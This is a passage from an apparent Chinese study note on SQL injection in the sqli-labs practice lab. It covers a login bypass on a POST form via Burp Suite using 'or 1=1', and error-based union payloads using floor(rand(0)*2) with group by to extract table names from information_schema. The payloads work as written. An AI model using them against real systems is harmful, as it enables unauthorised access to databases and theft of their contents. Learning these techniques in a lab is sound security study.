对于这种post请求,我们不方便直接在浏览器地址栏进行注入,当然也可以利用hackbar等插件,但是最好还是使用burp suite抓包到转发器进行注入
如图所示,我们要进行注入的话还是首先要测试诸如点,就在passwd的值后面加’或者\之类的,和之前的注入操作基本相似。
然后这里有一个万能密码就,虽然你密码输的不一定对,但是我 or 1=1 就一定对了
如图
就可以看到这边结果已经是登录成功了
基于报错的注入
http://127.0.0.1/sqli-labs/Less-1/?id=0’ union select 1,count(*),concat(0x3a,(在这里插入常规的查询语句),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
如
http://127.0.0.1/sqli-labs/Less-1/?id=0’ union select 1,count(*),concat(0x3a,(select group_concat(table_name) from information_schema.tables where database()=“security” ),0x3a,floor(rand(0)*2))a from information_schema.tables where database()=“security” group by a --+
所以这个格式要记住,关于报错产生的原因,大致就是由于group by 在判断和添加的时候会执行各执行一次后面的条件语句,由于随机数两次执行的结果不一样导致报错,而我们就利用这个报错提示我们来提示一些想要查询的东西
而具体的细节在我前面转载的一篇文章也有,这里同样附上链接
https://www.freebuf.com/column/235496.html